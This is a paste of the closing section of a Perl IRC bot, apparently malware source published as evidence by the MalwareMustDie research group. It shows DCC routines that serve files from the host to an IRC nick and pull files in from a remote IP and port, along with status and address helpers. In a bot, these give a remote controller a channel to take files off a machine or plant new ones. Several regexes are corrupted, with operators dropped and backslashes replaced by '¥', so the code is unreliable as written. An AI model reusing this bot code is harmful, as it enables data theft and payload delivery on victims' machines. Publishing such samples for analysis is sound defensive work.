  770.           if ($bytes_sended == $bytes) {
  771.              $fh->close;
  772.              $dcc_sel->remove($fh);
  773.              $DCC{$fh}{status} = "Enviado";
  774.              $DCC{$fh}{ftime} = time;
  775.              next;
  776.           }
  777.           open(SENDFILE, "< $arquivo");
  778.           seek(SENDFILE, $bytes_sended, 0);
  779.           my $send_bytes;
  780.           read(SENDFILE, $send_bytes, 1024);
  781.           print $fh "$send_bytes";
  782.           close(SENDFILE);
  783.      }
  784.    }
  785. }
  786.  
  787. sub SEND {
  788.   my ($nick, $arquivo) = @_;
  789.   unless (-r "$arquivo") {
  790.     return(0);
  791.   }
  792.   my $dccark = $arquivo;
  793.   $dccark =s/[.*¥/](¥S+)/$1/;
  794.   my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
  795.   my $longip = unpack("N",inet_aton($meuip));
  796.   my @filestat = stat($arquivo);
  797.   my $size_total=$filestat[7];
  798.   if ($size_total == 0) {
  799.      return(0);
  800.   }
  801.   my ($porta, $sendsock);
  802.   do {
  803.     $porta = int rand(64511);
  804.     $porta += 1024;
  805.     $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
  806.   } until $sendsock;
  807.   $DCC{$sendsock}{tipo} = 'send';
  808.   $DCC{$sendsock}{nick} = $nick;
  809.   $DCC{$sendsock}{bytes} = $size_total;
  810.   $DCC{$sendsock}{arquivo} = $arquivo;
  811.   &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
  812. }
  813. sub GET {
  814.   my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
  815.   return(0) if (-e "$arquivo");
  816.   if (open(FILE, "> $arquivo")) {
  817.      close FILE;
  818.   } else {
  819.     return(0);
  820.   }
  821.   my $dccip=fixaddr($dcclongip);
  822.   return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
  823.   my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
  824.   $dccsock->autoflush(1);
  825.   $dcc_sel->add($dccsock);
  826.   $DCC{$dccsock}{tipo} = 'get';
  827.   $DCC{$dccsock}{itime} = time;
  828.   $DCC{$dccsock}{nick} = $nick;
  829.   $DCC{$dccsock}{bytes} = $bytes;
  830.   $DCC{$dccsock}{curbyte} = 0;
  831.   $DCC{$dccsock}{arquivo} = $arquivo;
  832.   $DCC{$dccsock}{ip} = $dccip;
  833.   $DCC{$dccsock}{porta} = $dccporta;
  834.   $DCC{$dccsock}{status} = "Recebendo";
  835. }
  836. sub Status {
  837.   my $socket = shift;
  838.   my $sock_tipo = $DCC{$socket}{tipo};
  839.   unless (lc($sock_tipo) eq "chat") {
  840.     my $nick = $DCC{$socket}{nick};
  841.     my $arquivo = $DCC{$socket}{arquivo};
  842.     my $itime = $DCC{$socket}{itime};
  843.     my $ftime = time;
  844.     my $status = $DCC{$socket}{status};
  845.     $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
  846.  
  847.     my $d_time = $ftime-$itime;
  848.  
  849.     my $cur_byte = $DCC{$socket}{curbyte};
  850.     my $bytes_total =  $DCC{$socket}{bytes};
  851.  
  852.     my $rate = 0;
  853.     $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
  854.     my $porcen = ($cur_byte*100)/$bytes_total;
  855.  
  856.     my ($r_duv, $p_duv);
  857.     if ($rate =/^(¥d+)¥.(¥d)(¥d)(¥d)/) {
  858.        $r_duv = $3; $r_duv++ if $4 >= 5;
  859.        $rate = "$1¥.$2"."$r_duv";
  860.     }
  861.     if ($porcen =/^(¥d+)¥.(¥d)(¥d)(¥d)/) {
  862.        $p_duv = $3; $p_duv++ if $4 >= 5;
  863.        $porcen = "$1¥.$2"."$p_duv";
  864.     }
  865.     return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
  866.   }
  867.   return(0);
  868. }
  869.  
  870. sub fixaddr {
  871.     my ($address) = @_;
  872.  
  873.     chomp $address;
  874.     if ($address =/^¥d+$/) {
  875.         return inet_ntoa(pack "N", $address);
  876.     } elsif ($address =/^[12]?¥d{1,2}¥.[12]?¥d{1,2}¥.[12]?¥d{1,2}¥.[12]?¥d{1,2}$/) {
  877.         return $address;
  878.     } elsif ($address =tr/a-zA-Z//) {
  879.         return inet_ntoa(((gethostbyname($address))[4])[0]);
  880.     } else {
  881.         return;
  882.     }
  883. }
  884.  
  885. # ---- end of evidence----
  886.  
  887. #----
  888. #MalwareMustDie
  889. #"Thou Shalt not Hack"
RAW Paste Data